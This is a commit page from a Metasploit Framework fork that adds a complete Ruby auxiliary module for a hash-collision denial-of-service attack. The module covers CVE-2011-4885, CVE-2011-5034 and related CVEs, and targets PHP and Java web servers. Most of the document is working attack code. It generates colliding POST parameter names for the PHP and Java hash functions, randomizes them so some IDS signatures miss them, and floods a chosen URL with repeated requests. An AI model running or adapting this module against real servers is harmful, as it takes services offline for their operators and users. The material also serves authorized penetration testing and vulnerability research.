dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Adding FireFart's hashcollision DoS module 

Have some minor edits below, looks like it all works now though.

Squashed commit of the following:

commit b7befd4889f12105f36794b1caca316d1691b335
Author: Tod Beardsley <todb@metasploit.com>
Date:   Fri Jun 1 14:31:32 2012 -0500

    Removing ord in favor of unpack.

    Also renaming a 'character' variable to 'c' rather than 'i' which is
    easy to mistake for an Integer counter variable.

commit e80f6a5622df2136bc3557b2385822ba077e6469
Author: Tod Beardsley <todb@metasploit.com>
Date:   Fri Jun 1 14:24:41 2012 -0500

    Cleaning up print msgs

commit 5fd65ed54cb47834dc646fdca8f047fca4b74953
Author: Tod Beardsley <todb@metasploit.com>
Date:   Fri Jun 1 14:19:10 2012 -0500

    Clean up hashcollision_dos description

    Caps, mostly. One sentence I still don't get but it's not really a show
    stopper.

commit bec0ee43dc9078d34a328eb416970cdc446e6430
Author: Christian Mehlmauer <FireFart@gmail.com>
Date:   Thu May 24 19:11:32 2012 +0200

    Removed RPORT, ruby 1.8 safe, no case insensitive check, error handling

commit 20793f0dfd9103c4d7067a71e81212b48318d183
Author: Christian Mehlmauer <FireFart@gmail.com>
Date:   Tue May 22 23:11:53 2012 +0200

    Hashcollision Script (again)
This commit is contained in:
Christian Mehlmauer 2012-06-01 14:51:11 -05:00 committed by Tod Beardsley
parent 315d68b6f5
commit 6ae17db7d3
1 changed files with 221 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

221
modules/auxiliary/dos/http/hashcollision_dos.rb Normal file
View File

@ -0,0 +1,221 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Hashtable Collisions',
'Description' => %q{
This module uses a denial-of-service (DoS) condition appearing in a variety of
programming languages. This vulnerability occurs when storing multiple values
in a hash table and all values have the same hash value. This can cause a web server
parsing the POST parameters issued with a request into a hash table to consume
hours of CPU with a single HTTP request.
Currently, only the hash functions for PHP and Java are implemented.
This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo.
It also generates a random payload to bypass some IDS signatures.
},
'Author' =>
[
'Alexander Klink', # advisory
'Julian Waelde', # advisory
'Scott A. Crosby', # original advisory
'Dan S. Wallach', # original advisory
'Krzysztof Kotowicz', # payload generator
'Christian Mehlmauer <FireFart[at]gmail.com>' # metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['URL', 'http://www.ocert.org/advisories/ocert-2011-003.html'],
['URL', 'http://www.nruns.com/_downloads/advisory28122011.pdf'],
['URL', 'http://events.ccc.de/congress/2011/Fahrplan/events/4680.en.html'],
['URL', 'http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf'],
['URL', 'http://www.youtube.com/watch?v=R2Cq3CLI6H8'],
['CVE', '2011-5034'],
['CVE', '2011-5035'],
['CVE', '2011-4885'],
['CVE', '2011-4858']
],
'DisclosureDate'=> 'Dec 28 2011'
))
register_options(
[
OptEnum.new('TARGET', [ true, 'Target to attack', nil, ['PHP','Java']]),
OptString.new('URL', [ true, "The request URI", '/' ]),
OptInt.new('RLIMIT', [ true, "Number of requests to send", 50 ])
], self.class)
register_advanced_options(
[
OptInt.new('recursivemax', [false, "Maximum recursions when searching for collisionchars", 15]),
OptInt.new('maxpayloadsize', [false, "Maximum size of the Payload in Megabyte. Autoadjust if 0", 0]),
OptInt.new('collisionchars', [false, "Number of colliding chars to find", 5]),
OptInt.new('collisioncharlength', [false, "Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)", 2]),
OptInt.new('payloadlength', [false, "Length of each parameter in the payload", 8])
], self.class)
end
def generate_payload
# Taken from:
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
@recursive_counter = 1
collision_chars = compute_collision_chars
return nil if collision_chars == nil
length = datastore['payloadlength']
size = collision_chars.length
post = ""
max_value_float = size ** length
max_value_int = max_value_float.floor
print_status("Generating POST data...")
for i in 0.upto(max_value_int)
input_string = i.to_s(size)
result = input_string.rjust(length, "0")
collision_chars.each do |key, value|
result = result.gsub(key, value)
end
post << "#{Rex::Text.uri_encode(result)}=&"
end
return post
end
def compute_collision_chars
print_status("Trying to find hashes...") if @recursive_counter == 1
hashes = {}
counter = 0
length = datastore['collisioncharlength']
a = []
for i in @char_range
a << i.chr
end
# Generate all possible strings
source = a
for i in Range.new(1,length-1)
source = source.product(a)
end
source = source.map(&:join)
# and pick a random one
base_str = source.sample
base_hash = @function.call(base_str)
hashes[counter.to_s] = base_str
counter = counter + 1
for item in source
if item == base_str
next
end
if @function.call(item) == base_hash
# Hooray we found a matching hash
hashes[counter.to_s] = item
counter = counter + 1
end
if counter >= datastore['collisionchars']
break
end
end
if counter < datastore['collisionchars']
# Try it again
if @recursive_counter > datastore['recursivemax']
print_error("Not enough values found. Please start this script again.")
return nil
end
print_status("#{@recursive_counter}: Not enough values found. Trying again...")
@recursive_counter = @recursive_counter + 1
hashes = compute_collision_chars
else
print_status("Found values:")
hashes.each_value do |item|
print_status("\tValue: #{item}\tHash: #{@function.call(item)}")
item.each_char do |c|
print_status("\t\tValue: #{c}\tCharcode: #{c.unpack("C")}")
end
end
end
return hashes
end
# General hash function, Dan "djb" Bernstein times XX add
def djbxa(input_string, base, start)
counter = input_string.length - 1
result = start
input_string.each_char do |item|
result = result + ((base ** counter) * item.ord)
counter = counter - 1
end
return result.round
end
# PHP's hash function (djb times 33 add)
def djbx33a(input_string)
return djbxa(input_string, 33, 5381)
end
# Java's hash function (djb times 31 add)
def djbx31a(input_string)
return djbxa(input_string, 31, 0)
end
def run
case datastore['TARGET']
when /PHP/
@function = method(:djbx33a)
@char_range = Range.new(0, 255)
if (datastore['maxpayloadsize'] <= 0)
datastore['maxpayloadsize'] = 8
end
when /Java/
@function = method(:djbx31a)
@char_range = Range.new(0, 128)
if (datastore['maxpayloadsize'] <= 0)
datastore['maxpayloadsize'] = 2
end
else
raise RuntimeError, "Target #{datastore['TARGET']} not supported"
end
print_status("Generating payload...")
payload = generate_payload
return if payload == nil
# trim to maximum payload size (in MB)
max_in_mb = datastore['maxpayloadsize']*1024*1024
payload = payload[0,max_in_mb]
# remove last invalid(cut off) parameter
position = payload.rindex("=&")
payload = payload[0,position+1]
print_status("Payload generated")
for x in 1..datastore['RLIMIT']
print_status("Sending request ##{x}...")
opts = {
'method' => 'POST',
'uri' => datastore['URL'],
'data' => payload
}
begin
c = connect
r = c.request_cgi(opts)
c.send_request(r)
# Don't wait for a response, can take hours
rescue ::Rex::ConnectionError => exception
print_error("#{rhost}:#{rport} - unable to connect: '#{exception.message}'")
return
ensure
disconnect(c) if c
end
end
end
end